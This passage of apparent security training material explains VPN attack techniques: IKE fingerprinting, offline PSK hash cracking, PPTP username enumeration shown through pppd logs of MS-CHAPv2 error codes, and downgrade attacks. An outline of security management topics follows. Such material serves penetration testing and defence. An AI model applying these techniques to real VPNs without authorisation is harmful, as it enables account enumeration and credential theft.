Like any other server product, each manufacturer’s VPN server replies differently to the same request, which means it can be distinguished from other products and finally identified. The most advanced VPN fingerprinting tool is IKE-Scan, created by http://nta-monitor.com. IKE-Scan allows attackers to remotely identify the VPN product used by the target company by analyzing the server’s responses to IKE (Internet Key Exchange) protocol requests.
Offline password cracking
Using IKE Aggressive Mode, it is possible to obtain a hash from the VPN server and use this to mount an offline attack to crack the associated password. As
this attack is offline, it does not show in the VPN server log or cause account lockout. It is also extremely fast, typically several hundred thousand guesses per second:
 A six-character password using letters from A–Z, which has a possible 309 million combinations, can be cracked by brute force in 16 minutes
 A six-character password using letters and numbers, with a possible 57 billion combinations, can be cracked in two days.
VPNs are an attractive target to hackers as they carry sensitive information over an insecure network, and remote-access VPNs often allow full access to the internal network, while VPN traffic is usually invisible to IDS monitoring. With increasing security in other areas (e.g. more organizations installing firewalls, moving Internet servers onto the DMZ and automatically patching servers), the VPN becomes a more tempting target.
Scanning for services listening on TCP port 990 finds a brute-forceable Check Point Firewall VPN:
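The combination counts quoted above can be reproduced with simple keyspace arithmetic. A sketch, assuming “letters and numbers” means mixed-case letters plus digits (a 62-character alphabet), which is what matches the 57 billion figure:

```shell
# Keyspace sizes behind the cracking-time estimates (bash integer arithmetic)
echo $((26**6))   # six letters A-Z only: 308,915,776 (~309 million)
echo $((62**6))   # six chars from A-Z, a-z, 0-9: 56,800,235,584 (~57 billion)
```

At several hundred thousand guesses per second, 309 million guesses take on the order of 16 minutes and 57 billion take roughly two days, matching the bullets above.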
On some implementations it is configured to listen on port 80:
Identifying Check Point VPN-1 Edge Portal
VPN IKE User Enumeration
Many remote-access VPNs have vulnerabilities that allow valid usernames to be guessed through a dictionary attack, because they respond differently to valid and invalid usernames. One of the basic requirements of a username/password authentication scheme is that an incorrect login attempt should not leak information as to whether the username or the password was incorrect, because the attacker can then deduce whether the username is valid or not. However, many VPN implementations ignore this rule. The fact that VPN usernames are often based on people’s names or email addresses makes it relatively easy for an attacker to use a dictionary attack to recover a number of valid usernames in a short period of time.
VPN PPTP User Enumeration
Some devices allow remote user access through the PPTP VPN service. When enabled, this can normally be detected remotely through the presence of an open TCP port (1723) and the device’s acceptance of the GRE protocol (IP protocol number 47).
The PPTP VPN service uses MS-CHAPv2 for authentication. This relies on a challenge/response mechanism in order to successfully authenticate users. When a remote user attempts to authenticate with the PPTP VPN service, an MS-CHAPv2 packet should be returned indicating success or failure. Failure is indicated by the return of a code 4 MS-CHAPv2 packet. This packet will additionally contain a value in the form E=<error_number> which indicates the type of error that occurred. A list of common error codes is given below:
646 ERROR_RESTRICTED_LOGON_HOURS
647 ERROR_ACCT_DISABLED
648 ERROR_PASSWD_EXPIRED
649 ERROR_NO_DIALIN_PERMISSION
691 ERROR_AUTHENTICATION_FAILURE
709 ERROR_CHANGING_PASSWORD
The vulnerability occurs as a consequence of differences in the error codes returned in the failure packet, which depend on whether or not the username supplied is valid.
When a valid username is given with an incorrect password, the following response is returned:
sent [LCP ConfReq id=0x1 <asyncmap 0x0> <magic 0x444fc9b9> <accomp>]
rcvd [LCP ConfReq id=0x1 <mru 338> <auth chap MS-v2> <magic 0xfa52b227> <pcomp> <accomp>]
sent [LCP ConfRej id=0x1 <pcomp>]
rcvd [LCP ConfRej id=0x1 <asyncmap 0x0>]
sent [LCP ConfReq id=0x2 <magic 0x444fc9b9> <accomp>]
rcvd [LCP ConfReq id=0x2 <mru 338> <auth chap MS-v2> <magic 0xfa52b227> <accomp>]
sent [LCP ConfAck id=0x2 <mru 338> <auth chap MS-v2> <magic 0xfa52b227> <accomp>]
rcvd [LCP ConfAck id=0x2 <magic 0x444fc9b9> <accomp>]
sent [LCP EchoReq id=0x0 magic=0x444fc9b9]
rcvd [CHAP Challenge id=0x1 <d15340ea7112ac46f240e4f18fe2a278>, name = "watchguard"]
sent [CHAP Response id=0x1 <73469ca9bed04ea6f0e5d1be49b47a1a0000000000000000f424ac68e1231f756e1657a2bc25efcd3b7ba78110bcf48201>, name = "valid_username"]
rcvd [LCP EchoRep id=0x0 magic=0xfa52b227]
rcvd [CHAP Failure id=0x1 "E=691 R=1 Try again"]
MS-CHAP authentication failed: E=691 Authentication failure
CHAP authentication failed
However, when an invalid username is supplied, the following response is received:
sent [LCP ConfReq id=0x1 <asyncmap 0x0> <magic 0x9689f323> <accomp>]
rcvd [LCP ConfReq id=0x1 <mru 338> <auth chap MS-v2> <magic 0x245cdcee> <pcomp> <accomp>]
sent [LCP ConfRej id=0x1 <pcomp>]
rcvd [LCP ConfRej id=0x1 <asyncmap 0x0>]
sent [LCP ConfReq id=0x2 <magic 0x9689f323> <accomp>]
rcvd [LCP ConfReq id=0x2 <mru 338> <auth chap MS-v2> <magic 0x245cdcee> <accomp>]
sent [LCP ConfAck id=0x2 <mru 338> <auth chap MS-v2> <magic 0x245cdcee> <accomp>]
rcvd [LCP ConfAck id=0x2 <magic 0x9689f323> <accomp>]
sent [LCP EchoReq id=0x0 magic=0x9689f323]
rcvd [CHAP Challenge id=0x1 <d15340ea7112ac46f240e4f18fe2a278>, name = "watchguard"]
sent [CHAP Response id=0x1 <73469ca9bed04ea6f0e5d1be49b47a1a0000000000000000f424ac68e1231f756e1657a2bc25efcd3b7ba78110bcf48201>, name = "invalid_username"]
rcvd [LCP EchoRep id=0x0 magic=0x245cdcee]
rcvd [CHAP Failure id=0x1 "E=649 R=1 Try again"]
MS-CHAP authentication failed: E=649
CHAP authentication failed

VPN Clients Man-In-The-Middle Downgrade Attacks
Downgrade Attacks – IPSEC Failure
MITM attackers may block the key material exchanged on UDP port 500 to deceive the victims into thinking that an IPSEC connection cannot start on the other side. If the victim host is configured in rollback mode, the result is a clear-text stream over the connection without it being noticed.
Downgrade Attacks – PPTP
During the protocol negotiation phase at the beginning of a PPTP session, MITM attackers may force the victims to use the less secure PAP authentication, MS-CHAP v1 (i.e., downgrading from MS-CHAP v2), or even no encryption at all.
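The difference between the two transcripts is the E= value in the CHAP Failure line: E=691 (authentication failure, so the username exists) versus E=649 (no dial-in permission, i.e. the username is unknown). The error-code table above can be turned into a small decoding helper; `mschap_error` is a hypothetical function name, not part of any tool:

```shell
# Hypothetical helper: decode MS-CHAPv2 E=<code> failure values
# (codes taken from the table earlier in this section)
mschap_error() {
  case "$1" in
    646) echo ERROR_RESTRICTED_LOGON_HOURS ;;
    647) echo ERROR_ACCT_DISABLED ;;
    648) echo ERROR_PASSWD_EXPIRED ;;
    649) echo ERROR_NO_DIALIN_PERMISSION ;;
    691) echo ERROR_AUTHENTICATION_FAILURE ;;
    709) echo ERROR_CHANGING_PASSWORD ;;
    *)   echo UNKNOWN ;;
  esac
}
# Decode the two codes seen in the transcripts above
mschap_error 691
mschap_error 649
```

An enumeration script would simply try a username list and keep every name whose failure decodes to ERROR_AUTHENTICATION_FAILURE rather than ERROR_NO_DIALIN_PERMISSION.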
Attackers can also force re-negotiation (a Terminate-Ack packet in clear text), steal passwords from existing tunnels, and repeat previous attacks. Attackers can compel a “password change” to get password hashes that can be used directly by a modified SMB or PPTP client. MS-CHAP v1 hashes can also be abused in this way.
PPTP:
PPTP (Point-to-Point Tunneling Protocol) is a protocol for VPN implementation. Microsoft MS-CHAPv2 or EAP-TLS is used to authenticate PPTP connections. EAP-TLS (Extensible Authentication Protocol-Transport Layer Security) is certificate-based, and is thus a safer security option for PPTP than MS-CHAPv2.
PPTP Brute Force
Hacking VPNs with “Aggressive Mode” Enabled
Secure VPN
Insecure VPN
Got PSK Key (SHA1 Password Hash)
Cracked PSK Key (Full Brute-Force Attack – 1 hour on an Intel i7)
Downloading Check Point SecureClient
Attacking hosts in the internal network – remotely
Endpoint Security
 Device Control
 Application Control
 Data Loss Prevention
Penetration tests and red team exercises
 Examples
 Case studies
Implementing identity & access management
Creating backups, BCP & DRP
 Onsite storage
 Offsite storage
 Secured access to backups
 Scheduling backups
Security Metrics
 Measuring the effectiveness of investments
 Formal IT control review
 Cost-benefit perspective
 Implementation issues
 Commitment to continued improvement
Incident Response
 Identifying the probable risks
 Defining the incident assurance factors
 Defining the contacts and personnel per incident type
 Developing your security threat response plan
Creating an audit
 Defining the scope of your audit: creating asset lists and a security perimeter
 What is the security perimeter?
 Assets to consider
 Creating a “threats list”: what threats to include?
 Common threats to get you started
 Past due diligence & predicting the future
 Examining your threat history
 Checking security trends
 Checking with your competition
 Prioritizing your assets & vulnerabilities
 Performing a risk calculation / probability calculation
 Calculating probability
 Calculating harm
Conclusions
 Periodic and continual testing of controls
o As the security world is a very dynamic environment and new attack methods and techniques are invented every day, the security controls must be updated constantly
o Engine/product physical-level upgrade every few years
o Controls must be tested at least quarterly
 Future evolution of the 20 critical controls
o In the future most controls will integrate into the SIEM
o The SIEM will be the main operation center and will activate most of the controls, according to the rules defined
o All controls are going to focus on the application layer, mostly on web systems
o Desktop clients will almost disappear
o Attacks will be more high-level and logical; security will focus more and more on understanding systems and less on technical bugs and vulnerabilities
o At some point, in order to mitigate complex logical vulnerabilities, controls will integrate “Artificial Intelligence”
o The mobile world will integrate into the classical PC and network environment and will ultimately replace most PCs and/or laptops
 Summary and action plan
o Information security is a repetitive process
o Information security controls are the tools; they need the right setup, the right rules and periodical maintenance
o It is not right to buy 10 different solutions and store them in a box inside a closet
o Every solution has to be slowly implemented and integrated, one by one
o Compliance is the best tool of an information security manager to get management support to mitigate security issues
o Real-time monitoring of the critical systems, with the right rules and personnel reacting to these events, is more valuable than most security controls